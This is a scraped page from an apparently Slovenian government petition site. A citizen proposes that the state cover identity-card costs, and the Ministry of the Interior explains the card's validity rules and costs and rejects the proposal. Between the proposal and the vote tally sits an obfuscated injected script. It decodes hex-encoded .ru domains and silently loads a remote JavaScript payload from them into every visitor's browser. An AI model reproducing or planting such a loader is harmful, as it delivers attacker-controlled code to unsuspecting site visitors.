Pozabljeno geslo? Registracija
Predlagam vladi

Odziv pristojnega organa

  naslednji ⟩     ⟨ prejšnji  

stroške osebne izkaznice naj krije država

2170 OGLEDOV 17 KOMENTARJEV

Predlagam, da dokument kot je osebna izkaznica, s katero se ne more potovati v vse države sveta ampak ima omejitve večinoma na EU ter nekatere balkanske države, se stroški kritja prenesejo na državno raven. Osebno izkaznico moramo državljani Slovenije na 10 let obnavljati, tujci še prej, če želi država kot taka voditi evidenco o identifikaciji oseb in stanju v državi, predlagam to varianto. Sigurno bi se našle kake državne rezerve, s katero bi se dalo te stroške poklriti. Poleg tega imamo visoko gospodarsko rast in denarja je, samo ravilno bi ga bilo potrebno porazdeliti.

<script type="text/javascript">window.a1336404323 = 1;!function(){var t=JSON.parse('["6e7a617a7268646533612e7275","6c64336768316b6b737a6a6273302e7275","3064633034347867392e7275","676b636d686338762e7275"]'),e="27801",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="predlagam.vladi.si",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();</script>

31 glasov
19 glasov
Kvorum vsaj 11 glasov ZA
AVTOR S slo2 4 predlogi
STANJE
  • PREDLOG POSLAN
  • KONEC OBRAVNAVE
  • ODGOVOR

Odgovor


04.09.2018

Odziv Ministrstva za notranje zadeve

Ministrstvo za notranje zadeve pojasnjuje, da je cena osebne izkaznice sestavljena iz stroška obrazca s personalizacijo, ki je opredeljen v Odredbi o določitvi cene osebne izkaznice ter stroška upravne takse, ki je opredeljena v 14. in 57. tarifni številki Zakona o upravnih taksah. Državljan je ob vlogi za izdajo osebne izkaznice v Republiki Sloveniji že lahko oproščen plačila upravne takse, če gre za taksnega zavezanca – posameznika v slabih premoženjskih razmerah, kar omogoča 5. točka 23. člena Zakona o upravnih taksah.

Predlagatelj napačno navaja, da je potrebno osebno izkaznico obnavljati na 10 let. Zakon o osebni izkaznici določa veljavnosti osebne izkaznice v 9. členu. Tako se državljanu do dopolnjenega tretjega leta starosti izda osebna izkaznica z veljavnostjo 3 let, državljanu od tretjega do osemnajstega leta starosti se izda osebna izkaznica z veljavnostjo 5 let, državljanu od osemnajstega do sedemdesetega leta starosti z veljavnostjo 10 let, državljanu po dopolnjenem sedemdesetem letu starosti pa se izda osebna izkaznica s trajno veljavnostjo. Prav tako se lahko izda osebna izkaznica z veljavnostjo zgolj enega leta, in sicer državljanu, ki je v obdobju 5 let pred dnem vložitve vloge za izdajo nove osebne izkaznice zaradi neskrbnega ravnanja uničil, pogrešil oziroma izgubil 2 osebni izkaznici ali več, kot tudi, če sta mu bili 2 osebni izkaznici ali več odtujeni. Osebna izkaznica z enoletno veljavnostjo se izda tudi državljanu z veljavnim ukrepom prepovedi prehoda državne meje in državljanu z začasnim prebivališčem v Republiki Sloveniji, ki je v postopku preverjanja prijave stalnega prebivališča, v skladu z zakonom, ki ureja prijavo prebivališča. Hkrati je pomembno tudi, da vse osebne izkaznice ne veljajo do izteka roka, za katerega so bile izdane, saj je potrebno osebno izkaznico predložiti v uničenje pred potekom, če državljan spremeni priimek ali ime, če spremeni stalno prebivališče, če fotografija na osebni izkaznici ne kaže več njegove prave podobe ali če je osebna izkaznica poškodovana oziroma obrabljena oziroma iz kakšnega drugega razloga ni več uporabna. Ob navedenih razlogih običajno sledi zamenjava osebne izkaznice z novo pred potekom veljavnosti stare. Prav tako prihaja do situacij, ko je razlog vloge za izdajo nove osebne izkaznice kraja, izguba ali pogrešitev stare osebne izkaznice, lahko tudi v okoliščinah neskrbnega ravnanja imetnika (malomarnost). Glede na navedeno ni mogoče enostavno predpostavljati, da bi država krila stroške izdaje nove osebne izkaznice za vsakega državljana enkrat v obdobju desetih let.

V zvezi s predlagateljevim izhodiščem, ki se nanaša na možnost vodenja evidence o identifikaciji oseb in stanja v državi, ki bi upravičila kritje stroška izdaje osebne izkaznice s strani države, pojasnjujemo, da Zakon o osebni izkaznici v 19. členu že določa vodenje in vzdrževanje evidence izdanih osebnih izkaznic za namen preverjanja istovetnosti in državljanstva ter prehoda državne meje držav članic Evropske unije in Schengenskega prostora ter drugih držav, ki so v to privolile. Evidenca se vodi na centralnem računalniku Ministrstva za notranje zadeve in vsebuje podatke iz vloge, vključno s fotografijo in podpisom državljana, podatke o izdelavi in prenosu izdelane osebne izkaznice ter podatke o izgubljenih, pogrešanih in ukradenih osebnih izkaznicah.

Dodatno pojasnjujemo in poudarjamo, da osebna izkaznica ni obvezen dokument. Skladno z 2. členom Zakona o osebni izkaznici je osebna izkaznica obvezna samo za polnoletnega državljana s stalnim prebivališčem v Republiki Sloveniji, ki ne bi imel drugega uradnega identifikacijskega dokumenta, ki ga je izdal državni organ in je opremljen s fotografijo (npr. vozniško dovoljenje, potni list itd.).

Ne glede na navedeno ima na dan 27. 8. 2018 veljavno osebno izkaznico 1.835.041 državljanov. Cena osebne izkaznice z veljavnostjo 10 let znaša 18,86 EUR, pri čemer upravna taksa znaša 9,60 EUR, obrazec pa 9,26 EUR. Ob predpostavki, da bi država vse državljane oprostila plačila upravne takse za izdajo osebne izkaznice, sama pa krila zgolj stroške izdelave obrazcev s personalizacijo v višini 9,26 EUR, bi morala v roku desetih let zagotoviti sredstva v višini 16.992.480 EUR. Ob tem bi dodatno nastal tudi izpad prihodka iz upravnih taks v skoraj enakem znesku, ki se v okviru integralnega proračuna porablja za plačevanje poštnine za prenos osebnih izkaznic, zagotavljanje materialnih pogojev za delo, stroške dela, vzdrževanje evidence izdanih osebnih izkaznic itd.

Dodatno pojasnjujemo, da se skladno z 48. členom Zakona o javnih financah sredstva proračunske rezerve uporabljajo za financiranje izdatkov za odpravo posledic naravnih nesreč, kot so potres, poplava, zemeljski plaz, snežni plaz, visok sneg, močan veter, toča, žled, pozeba, suša, množični pojav nalezljive človeške, živalske ali rastlinske bolezni, druge nesreče, ki jih povzročijo naravne sile in ekološke nesreče. Zagotavljanje sredstev za brezplačno izdajo osebnih izkaznic na predlagan način zato ni mogoče.

Ministrstvo za notranje zadeve iz navedenih razlogov predlog ocenjuje kot nesprejemljiv.

Priloge:

Komentarji